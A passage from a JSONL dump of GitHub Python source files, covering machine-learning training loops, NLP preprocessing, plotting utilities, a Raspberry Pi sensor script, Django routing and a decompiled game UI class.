self.dataset.init_iter('dev')\n fout_filename = 'pred.dev.{}'.format(self.meta.epoch)\n with open(self.outputter.get_path(fout_filename), 'w') as fout:\n for dev_batch in tqdm(self.dataset.get_iter('dev'), desc='DEV'):\n stats = self.process_batch(dev_batch, train=False, fout=fout)\n dev_stats.add(stats)\n print('DEV @ {}: {}'.format(self.meta.epoch, dev_stats))\n dev_stats.log(self.outputter.tb_logger, self.meta.epoch, 'pn_dev_')\n self.meta.update_acc(dev_stats.accuracy / dev_stats.n)\n\n progress_bar.close()\n\n def test(self):\n test_stats = Stats()\n self.dataset.init_iter('test')\n fout_filename = 'pred.test.{}'.format(self.meta.epoch)\n with open(self.outputter.get_path(fout_filename), 'w') as fout:\n for test_batch in tqdm(self.dataset.get_iter('test'), desc='TEST'):\n stats = self.process_batch(test_batch, train=False, fout=fout)\n test_stats.add(stats)\n print('TEST @ {}: {}'.format(self.meta.epoch, test_stats))\n test_stats.log(self.outputter.tb_logger, self.meta.epoch, 'pn_test_')\n\n\n ################################\n # Processing a batch\n\n def process_batch(self, batch, train=False, fout=None):\n \"\"\"\n Process a batch of examples.\n\n Args:\n batch (list[???])\n train (bool): Whether it is training or testing\n fout (file): Dump predictions to this file\n Returns:\n a Stats containing the model's statistics\n \"\"\"\n stats = Stats()\n # Initialize the model\n if train:\n self.optimizer.zero_grad()\n self.model.train()\n else:\n self.model.eval()\n # Forward pass\n logit = self.model(batch)\n loss = self.model.get_loss(logit, batch)\n mean_loss = loss / len(batch)\n stats.n = len(batch)\n stats.loss = float(mean_loss)\n # Evaluate\n predictions = self.model.get_pred(logit, batch)\n self.dataset.evaluate(batch, predictions, stats, fout)\n # Gradient\n if train and mean_loss.requires_grad:\n mean_loss.backward()\n stats.grad_norm = clip_grad_norm_(\n self.model.parameters(),\n self.config.train.gradient_clip\n )\n self.optimizer.step()\n return stats\n","repo_name":"ppasupat/factored-span-parsing","sub_path":"spanparser/experiments.py","file_name":"experiments.py","file_ext":"py","file_size_in_byte":5462,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"35437221580","text":"#!usr/bin/env python \n# -*- coding:utf-8\n\nimport re \nimport json\n\ninput = \"jawiki-country.json/jawiki-country.json\"\noutput = \"jawiki-england.txt\"\n\nf = open(input, \"r\")\no = open(output, \"w\")\n\nfor line in f:\n doc = json.loads(line)\n\n if re.search(u\"イギリス\", doc[u\"title\"]):\n o.write(doc[u\"text\"])\no.close()\nf.close()","repo_name":"Toshiki-Sasaki/NLP100","sub_path":"chapter3/20.py","file_name":"20.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"43263806321","text":"import nltk\nfrom nltk.tokenize import word_tokenize\nfrom nltk.stem import WordNetLemmatizer\nimport numpy as np\nimport random\nimport pickle\nfrom collections import Counter\n\nlemmatizer = WordNetLemmatizer()\ntotal_lines = 10000000\n\n\ndef create_lexicon(pos_file, neg_file):\n lexicon = []\n for file in [pos_file, neg_file]:\n with open(file, 'r') as f:\n lines = f.readlines()\n for line in lines[:total_lines]:\n words = word_tokenize(line.lower())\n lexicon += list(words)\n\n lexicon = [lemmatizer.lemmatize(lex) for lex in lexicon]\n word_counts = Counter(lexicon)\n # word_counts = {\"word1\":1000, \"word2\":500, ...}\n\n lexicon2 = []\n for 
word in word_counts:\n # No common words and no least appearing words\n if 1000 > word_counts[word] > 50:\n lexicon2.append(word)\n\n return lexicon2\n\n\ndef sample_handling(sample, lexicon, classification):\n data = []\n # [\n # [[1,0,1,1,0],[0,1]],[[0,1,0,1,0],[1,0]],..\n # ]\n # [0, 1] - negative, [1, 0] - positive\n\n with open(sample, 'r') as f:\n lines = f.readlines()\n for line in lines[:total_lines]:\n words = word_tokenize(line.lower())\n words = [lemmatizer.lemmatize(word) for word in words]\n features = np.zeros(len(lexicon))\n for word in words:\n if word.lower() in lexicon:\n index = lexicon.index(word.lower())\n features[index] += 1\n features = list(features)\n data.append([features, classification])\n\n return data\n\n\ndef create_data(pos, neg, test_size=0.1):\n lexicon = create_lexicon(pos, neg)\n data = []\n data += sample_handling(pos, lexicon, [1, 0])\n data += sample_handling(neg, lexicon, [0, 1])\n random.shuffle(data)\n\n data = np.array(data)\n number_of_validation_instances = int(test_size * len(data))\n\n train_X = list(data[:, 0][:-number_of_validation_instances])\n train_Y = list(data[:, 1][:-number_of_validation_instances])\n validation_X = list(data[:, 0][-number_of_validation_instances:])\n validation_Y = list(data[:, 1][-number_of_validation_instances:])\n\n return train_X, validation_X, train_Y, validation_Y\n\n\nif __name__ == '__main__':\n train_X, validation_X, train_Y, validation_Y = create_data('../data/pos.txt', '../data/neg.txt')\n with open('sentiment_data.pkl', 'wb') as f:\n pickle.dump([train_X, validation_X, train_Y, validation_Y], f)\n","repo_name":"omkaracharya/Tutorials","sub_path":"Tensorflow/NeuralNets/sentiment_features.py","file_name":"sentiment_features.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19737897374","text":"import mpl_toolkits.axisartist as AA\nfrom mpl_toolkits.axes_grid1 import host_subplot\n\nimport math\nfrom datetime import tzinfo, timedelta, date, datetime\nimport timezones as tz\nimport logging as l\nfrom numpy import min, max\n\n# TODO: get rid of rogue docstrings!!! 
and maybe add good ones?\n\ndef init_axis(rows, cols, i, twin=False):\n\t# this creates axes with the axes artist loaded\n\tax = host_subplot(rows, cols, i) # ,axes_class=AA.Axes)\n\tif twin:\n\t\t# the twin axis will create a second X and Y axis on the top and the left!\n\t\treturn ax, ax.twin()\n\telse:\n\t\treturn ax\ndef init_axis_gs (gs, twin=False, sharex=False):\n\tif not sharex:\n\t\tax = host_subplot(gs, axes_class=AA.Axes)\n\telse:\n\t\tax = host_subplot(gs, axes_class=AA.Axes, sharex=sharex)\n\tif twin:\n\t\treturn ax, ax.twin()\n\telse:\n\t\treturn ax\n\n\"\"\" the tt functions allow you to call a tiemzone specific function, without having to import tzinfo\"\"\"\ndef ttUTC(begin, end=False, **kwargs):\n\t_tt(begin, end, tz.utcTZ(), **kwargs)\n\ndef ttMST(begin, end=False, **kwargs):\n\t_tt(begin, end, tz.mstTZ(), **kwargs)\n\ndef _tt(begin, end=False, userTZ=tz.utcTZ(), ax=None, xy='x',\n\tmajor_count=5., minor_count=6., nodates=False, plt=False, notext=False,\n\tlabel=False, focus_hour=12, **kwargs):\n\t'''\n\tcreate time ticks\n\t'''\n\tif not end:\n\t\t'we can accept simply a list of times, and take the first and last values'\n\t\tend = begin[-1]\n\t\tbegin = begin[0]\n\t'determine the gaps'\n\tduration = float(end - begin)\n\tnative_dt = duration / (major_count - 1.)\n\t'So, figure out where this is closest to'\n\tif not ax and not plt:\n\t\tl.warning('tt: No axis instance (ax) or plt specified!')\n\t\treturn False\n\n\tdef alg(dt):\n\t\t# the dt is a multiple of this many hours, an algoritm\n\t\tif dt < 3 * 3600:\n\t\t\t'1,2,3'\n\t\t\treturn 3600\n\t\telif dt < 18 * 3600:\n\t\t\t'6,9,12,15,18'\n\t\t\treturn 3 * 3600\n\t\telif dt < 36 * 3600:\n\t\t\t'24,30,36'\n\t\t\treturn 6 * 3600\n\t\telif dt < 192 * 3600:\n\t\t\treturn 12 * 3600\n\t\t\t'48,60,72,84,96,...'\n\t\telse:\n\t\t\treturn 24 * 3600\n\t\t\t'some range of integer days'\n\n\tif native_dt < 3600:\n\t\t'''\n\t\tif to make major_count-1 segments is less than an hour, then simply\n\t\tmake major_count segments.\n\t\t'''\n\t\tdt = duration / major_count\n\telse:\n\t\tcount = 100.\n\t\tdt = 0 # lets the functions act more purely?\n\t\twhile count > major_count:\n\t\t\tdt += alg(native_dt)\n\t\t\tcount = duration / dt\n\t'Not perfect, but it will do for now...'\n\tif dt % (24 * 6) == 0:\n\t\t# then we are working with dt > 6 days:\n\t\t# find the minor_dt which gives minor_count or one more integer days\n\t\t# days = dt / 24 # number of days per major tick\n\n\t\tminor_dt = 24 * 3600 # for now. #FIXME - BANDAID SOLUTION!\n\telse:\n\t\tminor_dt = dt / minor_count\n\t'''\n\tI could add more logic to this computation, but I cannot figure out a good\n\tway to actually make anything better.\n\t'''\n\n\t'now find the ticks'\n\t'determine if the date should be shown or not'\n\tst = datetime.fromtimestamp(begin, tz=userTZ)\n\ten = datetime.fromtimestamp(end, tz=userTZ)\n\tincl_dates = False\n\tincl_times = True\n\tif duration > 86400 or not st.day == en.day: incl_dates = True\n\n\t'''\n\tDetermine tick beginning time. 
The logic here will be that\n\tif there is a whole hour within 1/3 of a dt range, then start there\n\t\n\tif dt > 192 hours, then we are looking for a 00 hour\n\t'''\n\tstart = begin\n\n\tshift_st = datetime.fromtimestamp(begin + dt / 3, tz=userTZ)\n\t# if the hour is a multiple of 3, and minute 0, then skip this\n\tif dt > 192 * 3600:\n\t\t# do the >24 hour business\n\t\tl.debug('tt: computing integer date timestamps')\n\t\t# fix minutes\n\t\tif st.minute > 0:\n\t\t\tstart += (59 - st.minute) * 60 + 60 - st.second\n\t\t# recompute the start time object\n\t\tst = datetime.fromtimestamp(start, tz=userTZ)\n\t\t# now just shift to the next time the hour is 0\n\t\t# focus_hour is 12 by default, picking midday to indicate.\n\t\t# but it might be more properly 12.\n\t\tif not focus_hour:\n\t\t\tfocus_hour = 0\n\t\twhile not st.hour == focus_hour:\n\t\t\tstart += 3600.\n\t\t\tst = datetime.fromtimestamp(start, tz=userTZ)\n\t\tincl_times = False\n\telif not shift_st.hour == st.hour and not (st.minute == 0 and st.hour % 3 == 0):\n\t\tl.debug('computing start time shift, data: ' + str(st.hour) + ' m: ' + str(st.minute))\n\t\t# 'We have determined that within the first third of a bin, there is an hour change'\n\t\t# 'shift this thing to the next full hour'\n\t\tif st.minute > 0:\n\t\t\tstart += (59 - st.minute) * 60 + 60 - st.second\n\t\t# 'THEN! if dt is > 4 hours, then find the nearest multiple of 3'\n\t\tif dt > 4 * 3600:\n\t\t\tshift_st = datetime.fromtimestamp(start, tz=userTZ)\n\t\t\twhile not shift_st.hour % 3 == 0:\n\t\t\t\tstart += 3600\n\t\t\t\tshift_st = datetime.fromtimestamp(start, tz=userTZ)\n\n\n\tt = start\n\ttimes = []\n\ttexts = []\n\n\t# make major ticks\n\tif nodates:\n\t\t# catch the nodates correction\n\t\tincl_dates = False\n\twhile t <= end + dt:\n\t\ttimes.append(t)\n\t\t# determine the relevant text\n\t\tdtobj = datetime.fromtimestamp(t, tz=userTZ)\n\t\tt += dt\n\t\tif notext:\n\t\t\ttexts.append('')\n\t\telif incl_dates and incl_times:\n\t\t\ttexts.append(dtobj.strftime('%H:%M\\n%d %b %Y'))\n\t\telif incl_times:\n\t\t\ttexts.append(dtobj.strftime('%H:%M'))\n\t\telse:\n\t\t\ttexts.append(dtobj.strftime('%d %b %Y'))\n\n\n\t# 'make minor ticks'\n\tt = start - dt\n\tminor_times = []\n\twhile t < end + dt:\n\t\tminor_times.append(t)\n\t\tt += minor_dt\n\t'and draw the actual ticks'\n\tif plt:\n\t\t'if a plt key is passed, then that supercedes the ax key passed.'\n\t\tax = plt.gca()\n\tcustomTick(ax, xy, times, texts, minor=minor_times)\n\n\tif xy == 'x':\n\t\t# some special things can be done when this is on the x axis\n\t\t# note, none of this is special to the x-x=axis\n\t\tif max(times) > end:\n\t\t\tend = max(times)\n\t\t# set the limit so the last tick actually gets plotted.\n\t\tax.set_xlim((begin - 1, end + 1))\n\n\t\t# if text is being made, then apply the label to the axis\n\t\tif not notext:\n\t\t\taxis_label = 'Time (' + userTZ.tzname(False) + ')'\n\t\t\tif not incl_dates:\n\t\t\t\t# then no dates are shown because there is only one date in the fig\n\t\t\t\taxis_label += ' on ' + st.strftime('%d %b %Y')\n\t\t\tif label:\n\t\t\t\taxis_label += ' ' + label\n\t\t\tax.set_xlabel(axis_label)\n\n\ndef tick(axis, interval, minor=False):\n\t# perform a dirty import of the tick library\n\timport matplotlib.ticker as tk\n\tfmt = tk.FormatStrFormatter('%i')\n\tloc = tk.MultipleLocator(base=interval)\n\t# now set!\n\taxis.set_major_formatter(fmt)\n\taxis.set_major_locator(loc)\n\tif minor:\n\t\tminor = tk.MultipleLocator(base=minor)\n\t\taxis.set_minor_locator(minor)\n\ndef 
no_ticks(plt, xy='x'):\n\tif xy == 'x':\n\t\tplt.gca().get_xaxis().set_ticks([])\n\telse:\n\t\tplt.gca().get_yaxis().set_ticks([])\n\t'NOTE, this may not remove labels...'\n\ndef customTick(ax, xy, vals, labels, minor=False):\n\tif xy == 'x':\n\t\tax.set_xticks(vals)\n\t\tax.set_xticklabels(labels)\n\t\tif minor:\n\t\t\tax.set_xticks(minor, minor=True)\n\telse:\n\t\tax.set_yticks(vals)\n\t\tax.set_yticklabels(labels)\n\t\tif minor:\n\t\t\tax.set_yticks(minor, minor=True)\n\ndef label_x(ax, label):\n\tax.set_xlabel(label)\n\ndef label_y(ax, label):\n\tax.set_ylabel(label)\n\n\n# colorbar!!!\ndef colbar_ceilometer(fig, data):\n\tfig.colorbar(data, **{\n\t\t'orientation':'horizontal',\n\t\t'fraction':0.04,\n\t\t'pad':0.1,\n\t\t# 'format':tk.FormatStrFormatter(r\"%1.1f\\linebreak$\\displaystyle m^{-1}$sr^{-1}$\"),\n\t\t'aspect':40,\n\t\t'drawedges':False\n\t})\n\ndef fig_size(fig, x, y):\n\tfig.set_size_inches(x, y)\n\ndef ep2num(num):\n\treturn num\n\ndef tick_labels(list, userTZ=tz.mstTZ(), nodates='auto', notimes='auto'):\n\t'''\n\tReturn a list of labels for a given list of times, following our rules above.\n\t\n\ta utility for when the algorithms used previously are not sufficient\n\tlist, is the list of times\n\tnodates specifies if the date will be in the text (default is auto, if a day changes, then yes)\n\tnotimes specifies if the time should not be shown, (default is auto, always show time)\n\t'''\n\tlx = max(list)\n\tln = min(list)\n\tdt = lx - ln\n\tst = datetime.fromtimestamp(ln, tz=userTZ)\n\ten = datetime.fromtimestamp(lx, tz=userTZ)\n\tif nodates == 'auto':\n\t\tif dt > 86400 or not st.day == en.day:\n\t\t\t# show dates!\n\t\t\tnodates = False\n\t\telse:\n\t\t\tnodates = True\n\tif notimes == 'auto':\n\t\tnotimes = False\n\n\tout = []\n\tif nodates and notimes:\n\t\treturn out * len(list)\n\ti = 0\n\tfor t in list:\n\n\t\tdtobj = datetime.fromtimestamp(t, tz=userTZ)\n\t\tif not nodates and not notimes:\n\t\t\tout.append(dtobj.strftime('%H:%M\\n%d %b %Y'))\n\t\telif nodates:\n\t\t\tout.append(dtobj.strftime('%H:%M'))\n\t\telse:\n\t\t\tout.append(dtobj.strftime('%d %b %Y'))\n\treturn out\n","repo_name":"joeyoun9/cleanfig","sub_path":"cleanfig/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8275,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"354661214","text":"import RPi.GPIO as GPIO\nimport time\n \nTRIGGER_PIN = 25\nECHO_PIN = 8\n \nGPIO.setmode(GPIO.BCM)\nGPIO.setup(TRIGGER_PIN, GPIO.OUT)\nGPIO.setup(ECHO_PIN, GPIO.IN)\n \nGPIO.output(TRIGGER_PIN, GPIO.LOW)\ntime.sleep(1)\n \ntry:\n print('Ctrl-C')\n while True:\n GPIO.output(TRIGGER_PIN, GPIO.HIGH)\n time.sleep(0.00001)\n GPIO.output(TRIGGER_PIN, GPIO.LOW)\n while GPIO.input(ECHO_PIN) == 0:\n start_time = time.time()\n while GPIO.input(ECHO_PIN) == 1:\n end_time = time.time()\n etime = end_time - start_time\n distance = 17150 * etime\n print('{:.1f}'.format(distance))\n time.sleep(5)\nexcept KeyboardInterrupt:\n print('closeapp')\nfinally:\n GPIO.cleanup()\n","repo_name":"ryanwu1717/SmartLibraryGuidanceRobotandAssistant-","sub_path":"hc_sr04_raw.py","file_name":"hc_sr04_raw.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28206178926","text":"'''\n题目:一个5位数,判断它是不是回文数。\n'''\n\nnum = str(int(input('输入数字:')))\n\n# 判断是否为回文\ndef palindrome(s):\n for i in range(len(s) // 2):\n if s[i] != s[-i - 1]:\n return False\n return 
True\n\n\nprint('是否为回文数:', palindrome(num))\n","repo_name":"woider/PythonExercise","sub_path":"case_20/sub_30.py","file_name":"sub_30.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"zh","doc_type":"code","stars":444,"dataset":"github-code","pt":"40"} +{"seq_id":"6690773446","text":"from django.urls import include, path\nfrom django.views.generic import TemplateView\nfrom rest_framework import routers\nfrom rest_framework.schemas import get_schema_view\n\nfrom game.views import MinesweeperGameViewSet\n\nrouter = routers.DefaultRouter()\nrouter.register(r'minesweeper', MinesweeperGameViewSet, basename='minesweeper')\n\nurlpatterns = [\n path('api/', include(router.urls)),\n path('openapi/', get_schema_view(\n title=\"Your Project\",\n description=\"API for all things …\",\n version=\"1.0.0\"\n ), name='openapi-schema'),\n path('swagger-ui/', TemplateView.as_view(\n template_name='swagger-ui.html',\n extra_context={'schema_url': 'openapi-schema'}\n ), name='swagger-ui'),\n]\n","repo_name":"juanlanuzag/minesweeper","sub_path":"back/minesweeper/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27299952902","text":"import numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Activation\nfrom keras.layers.core import Dense\nfrom keras.optimizers import Adam\nfrom keras.callbacks import EarlyStopping\n\nprint(\"\\n\")\nprint(\"#\"*5, end = '')\nprint(\"TRAINING MODEL\", end='')\nprint(\"#\"*5)\nprint(\"\\n\")\n\ndef getModel(inputShape):\n #Defining model\n model = Sequential()\n model.add(Dense(32, input_shape = [inputShape,], activation = 'relu'))\n model.add(Dense(32, activation = 'relu'))\n model.add(Dense(32, activation = 'relu'))\n model.add(Dense(32, activation = 'relu'))\n model.add(Dense(1, activation = 'relu'))\n model.summary()\n return model\n#Defining callbacks\ncallbacks = [\n EarlyStopping(monitor='loss', patience=3, verbose = 0)]\n\n#Function reference for standardizing\nscaler = StandardScaler()\n\nPATH_LIST = ['../../../datasets/Positionwise/centre_backs.csv', '../../../datasets/Positionwise/free_roamers.csv',\n '../../../datasets/Positionwise/full_backs.csv', '../../../datasets/Positionwise/midfielders.csv',\n '../../../datasets/Positionwise/strikers.csv', '../../../datasets/Positionwise/wingers.csv']\n\nfor i in tqdm(range(len(PATH_LIST)), desc = \"Training Model\", ncols = 100):\n\n #Reading PATH\n dataset = pd.read_csv(PATH)\n\n #Cleaning Dataset\n dataset.isna().sum()\n dataset = dataset.dropna()\n\n #Getting all attributes\n attributeList = list(dataset.columns)[14:]\n\n #Filtering dataframe\n dataset = dataset[attributeList+['overall']]\n\n #Obtaining model's input and output\n X = np.array(dataset[attributeList])\n y = np.array(dataset[['overall']])\n\n X = scaler.fit_transform(X)\n\n #Splitting into test and train\n X_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.2)\n\n #Obtaining model\n model = getModel(len(X[0]))\n\n #Compiling model\n model.compile(Adam(),loss = 'mse' )\n\n #Training model\n history = model.fit(X_train,y_train,batch_size = 20,shuffle=True,verbose=0,epochs = 5000, callbacks=callbacks)\n\n #Saving weights\n model.save_weights(f\"./weights/{PATH[28:-4]}.h5\")\n\n # #Evaluating model\n print(\"Evaluate 
on test data\")\n results = model.evaluate(X_test, y_test, batch_size=20)\n print(\"test loss, test acc:\", results)\n\n fileName = f\"./output/{PATH[28:-4]}.txt\"\n with open(fileName, 'w') as file:\n modelOutput = model.predict(X_test)\n for i in range(len(y_test)):\n file.write(f\"Expected Output: {y_test[i][0]}\\tModel's Output: {modelOutput[i][0]}\\n\")\n #model.predict([[88, 95, 70, 92, 88]])\n #X_test[-1]\n #y_test[-1]\n\n","repo_name":"LaRuim/SDS-Project","sub_path":"scripts/hypothesis/ml_model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1158895897","text":"# 2015.11.18 11:53:29 Støední Evropa (bìžný èas)\n# Embedded file name: scripts/client/gui/Scaleform/daapi/view/lobby/boosters/BoostersWindow.py\nfrom collections import defaultdict\nfrom operator import attrgetter\nimport constants\nfrom adisp import process\nfrom helpers.i18n import makeString as _ms\nfrom gui import SystemMessages\nfrom gui import DialogsInterface\nfrom gui.ClientUpdateManager import g_clientUpdateManager\nfrom gui.Scaleform.daapi.view.lobby.boosters.BoostersPanelComponent import ADD_BOOSTER_ID\nfrom gui.Scaleform.daapi.view.meta.BoostersWindowMeta import BoostersWindowMeta\nfrom gui.goodies.Booster import MAX_ACTIVE_BOOSTERS_COUNT\nfrom gui.goodies.GoodiesCache import g_goodiesCache\nfrom gui.server_events import g_eventsCache, events_dispatcher as quests_events\nfrom gui.shared.formatters import text_styles\nfrom gui.Scaleform.locale.MENU import MENU\nfrom gui.Scaleform.locale.TOOLTIPS import TOOLTIPS\nfrom gui.shared.gui_items.processors.goodies import BoosterActivator\nfrom gui.shared.utils import decorators\nfrom gui.shared.utils.requesters.ItemsRequester import REQ_CRITERIA\nfrom gui.shared.utils.functions import makeTooltip\nfrom gui.Scaleform.genConsts.BOOSTER_CONSTANTS import BOOSTER_CONSTANTS\nfrom gui.Scaleform.locale.RES_ICONS import RES_ICONS\nfrom gui.Scaleform.daapi.view.dialogs import I18nConfirmDialogMeta\nfrom gui.Scaleform.daapi.view.dialogs import DIALOG_BUTTON_ID\n\nclass BoostersWindow(BoostersWindowMeta):\n\n def __init__(self, ctx = None):\n super(BoostersWindow, self).__init__()\n self._availableBoosters = None\n self._boosterQuests = None\n self._activeBoosters = None\n self._isReceivedBoostersTab = ctx.get('slotID', None) != ADD_BOOSTER_ID\n self._boostersInQuestCount = 0\n return\n\n def onWindowClose(self):\n self.destroy()\n\n def requestBoostersArray(self, isReceivedBoostersTab):\n self._isReceivedBoostersTab = isReceivedBoostersTab\n self.as_setListDataS(self.__getBoostersVOs(self._isReceivedBoostersTab), False)\n self.__setCommonData()\n\n @process\n def onBoosterActionBtnClick(self, boosterID, questID):\n if self._isReceivedBoostersTab:\n booster = g_goodiesCache.getBooster(boosterID)\n activeBooster = self.__getActiveBoosterByType(booster.boosterType)\n if activeBooster is not None:\n canActivate = yield DialogsInterface.showDialog(I18nConfirmDialogMeta(BOOSTER_CONSTANTS.BOOSTER_ACTIVATION_CONFORMATION_TEXT_KEY, messageCtx={'newBoosterName': text_styles.middleTitle(booster.description),\n 'curBoosterName': text_styles.middleTitle(activeBooster.description)}, focusedID=DIALOG_BUTTON_ID.CLOSE))\n else:\n canActivate = True\n if canActivate:\n self.__activateBoosterRequest(booster)\n else:\n quests_events.showEventsWindow(questID, constants.EVENT_TYPE.BATTLE_QUEST)\n return\n\n def _populate(self):\n super(BoostersWindow, 
self)._populate()\n g_clientUpdateManager.addCallbacks({'goodies': self.__onUpdateGoodies})\n g_eventsCache.onSyncCompleted += self.__onUpdateGoodies\n self._availableBoosters = self.__getAvailableBoosters()\n self._boosterQuests = self.__getBoosterQuests()\n self._activeBoosters = self.__getActiveBoosters()\n self._boostersInQuestCount = self.__getBoostersCountInQuests()\n self.as_setListDataS(self.__getBoostersVOs(self._isReceivedBoostersTab), True)\n self.__setCommonData()\n self.__setStaticData()\n\n def _dispose(self):\n g_clientUpdateManager.removeObjectCallbacks(self)\n g_eventsCache.onSyncCompleted -= self.__onUpdateGoodies\n self._availableBoosters = None\n self._boosterQuests = None\n self._activeBoosters = None\n self._isReceivedBoostersTab = None\n super(BoostersWindow, self)._dispose()\n return\n\n def __onUpdateGoodies(self, *args):\n self._activeBoosters = self.__getActiveBoosters()\n self._availableBoosters = self.__getAvailableBoosters()\n self._boosterQuests = self.__getBoosterQuests()\n self._boostersInQuestCount = self.__getBoostersCountInQuests()\n self.__setCommonData()\n self.as_setListDataS(self.__getBoostersVOs(self._isReceivedBoostersTab), False)\n\n def __setStaticData(self):\n self.as_setStaticDataS({'noInfoText': text_styles.standard(MENU.BOOSTERSWINDOW_BOOSTERSTABLE_NOINFO),\n 'windowTitle': _ms(MENU.BOOSTERSWINDOW_TITLE),\n 'closeBtnLabel': _ms(MENU.BOOSTERSWINDOW_CLOSEBTN_LABEL),\n 'noInfoBgSource': RES_ICONS.MAPS_ICONS_BOOSTERS_NOINFOBG})\n\n def __setCommonData(self):\n isHaveNotInfo = not self._boostersInQuestCount\n if self._isReceivedBoostersTab:\n isHaveNotInfo = not len(self._availableBoosters)\n self.as_setDataS({'isHaveNotInfo': isHaveNotInfo,\n 'availableTabLabel': self.__getAvailableTabLabel(),\n 'notAvailableTabLabel': self.__getNotAvailableTabLabel(),\n 'activeText': self.__getActiveText(),\n 'isReceivedBoostersTab': self._isReceivedBoostersTab})\n\n def __getBoostersCountInQuests(self):\n boostersCount = 0\n questsBoosters = self._boosterQuests.values()\n for boosters in questsBoosters:\n for _, count in boosters:\n boostersCount += count\n\n return boostersCount\n\n def __getAvailableTabLabel(self):\n boostersCount = sum((booster.count for booster in self._availableBoosters))\n return _ms(MENU.BOOSTERSWINDOW_TABS_AVAILABLELABEL, availableNo=boostersCount)\n\n def __getNotAvailableTabLabel(self):\n return _ms(MENU.BOOSTERSWINDOW_TABS_NOTAVAILABLELABEL, notAvailableNo=self._boostersInQuestCount)\n\n def __getActiveText(self):\n return text_styles.highTitle(_ms(MENU.BOOSTERSWINDOW_ACTIVEBOOSTERS, activeNo=len(self._activeBoosters), allNo=MAX_ACTIVE_BOOSTERS_COUNT))\n\n def __getBoostersVOs(self, isReceivedBoostersTab):\n boosterVOs = []\n if isReceivedBoostersTab:\n for booster in self._availableBoosters:\n boosterVOs.append(self.__makeBoosterVO(booster, booster.isReadyToActivate))\n\n else:\n for (questID, qUserName), boosters in self._boosterQuests.iteritems():\n for booster, count in boosters:\n boosterVOs.append(self.__makeBoosterVO(booster, questID is not None, questID, qUserName, count))\n\n return boosterVOs\n\n def __getBoosterFullName(self, booster):\n return text_styles.middleTitle(_ms(MENU.BOOSTERSWINDOW_BOOSTERSTABLERENDERER_HEADER, boosterName=booster.userName, quality=booster.qualityStr))\n\n def __makeBoosterVO(self, booster, isBtnEnabled, questID = None, qUserName = None, qBoosterCount = None):\n activateBtnLabel = MENU.BOOSTERSWINDOW_BOOSTERSTABLERENDERER_ACTIVATEBTNLABEL if questID is None else 
MENU.BOOSTERSWINDOW_BOOSTERSTABLERENDERER_GOTOQUESTBTNLABEL\n return {'id': booster.boosterID,\n 'questID': questID,\n 'actionBtnEnabled': isBtnEnabled,\n 'actionBtnTooltip': self.__getQuestTooltip(qUserName, isBtnEnabled),\n 'headerText': self.__getBoosterFullName(booster),\n 'descriptionText': text_styles.main(booster.description),\n 'addDescriptionText': self.__getAdditionalDescription(booster, qUserName),\n 'actionBtnLabel': _ms(activateBtnLabel),\n 'boosterSlotVO': self.__makeBoosterSlotVO(booster, qBoosterCount)}\n\n def __makeBoosterSlotVO(self, booster, qBoosterCount):\n boosterCount = qBoosterCount or booster.count\n return {'icon': booster.icon,\n 'countText': text_styles.counter(str(boosterCount)),\n 'showCount': boosterCount > 1,\n 'qualityIconSrc': booster.getQualityIcon(),\n 'slotLinkage': BOOSTER_CONSTANTS.SLOT_UI,\n 'showLeftTime': False}\n\n def __getQuestTooltip(self, qUserName, isBtnEnabled):\n if qUserName is not None:\n return makeTooltip(None, _ms(TOOLTIPS.BOOSTER_QUESTLINKBTN_BODY, questName=qUserName))\n elif not isBtnEnabled:\n return makeTooltip(None, _ms(TOOLTIPS.BOOSTER_ACTIVEBTN_DISABLED_BODY))\n else:\n return ''\n\n def __getAdditionalDescription(self, booster, qUserName):\n if qUserName is not None:\n text = _ms(MENU.BOOSTERSWINDOW_BOOSTERSTABLERENDERER_QUESTFOROPEN, questName=qUserName)\n elif booster.expiryTime:\n text = _ms(MENU.BOOSTERSWINDOW_BOOSTERSTABLERENDERER_TIME, tillTime=booster.getExpiryDate())\n else:\n text = _ms(MENU.BOOSTERSWINDOW_BOOSTERSTABLERENDERER_UNDEFINETIME)\n return text_styles.standard(text)\n\n def __getAvailableBoosters(self):\n criteria = REQ_CRITERIA.BOOSTER.IN_ACCOUNT\n return g_goodiesCache.getBoosters(criteria=criteria).values()\n\n def __getActiveBoosters(self):\n return g_goodiesCache.getBoosters(criteria=REQ_CRITERIA.BOOSTER.ACTIVE).values()\n\n def __getActiveBoosterByType(self, bType):\n criteria = REQ_CRITERIA.BOOSTER.ACTIVE | REQ_CRITERIA.BOOSTER.BOOSTER_TYPES([bType])\n activeBoosters = g_goodiesCache.getBoosters(criteria=criteria).values()\n if len(activeBoosters) > 0:\n return max(activeBoosters, key=attrgetter('effectValue'))\n else:\n return None\n\n def __getBoosterQuests(self):\n result = defaultdict(list)\n quests = g_eventsCache.getQuests(lambda q: q.isAvailable()[0] and not q.isCompleted())\n for q in quests.itervalues():\n bonuses = q.getBonuses('goodies')\n for b in bonuses:\n boosters = b.getBoosters()\n for booster, count in boosters.iteritems():\n result[q.getID(), q.getUserName()].append((booster, count))\n\n return result\n\n @decorators.process('loadStats')\n def __activateBoosterRequest(self, booster):\n result = yield BoosterActivator(booster).request()\n if len(result.userMsg):\n SystemMessages.g_instance.pushI18nMessage(result.userMsg, type=result.sysMsgType)\n# okay decompyling 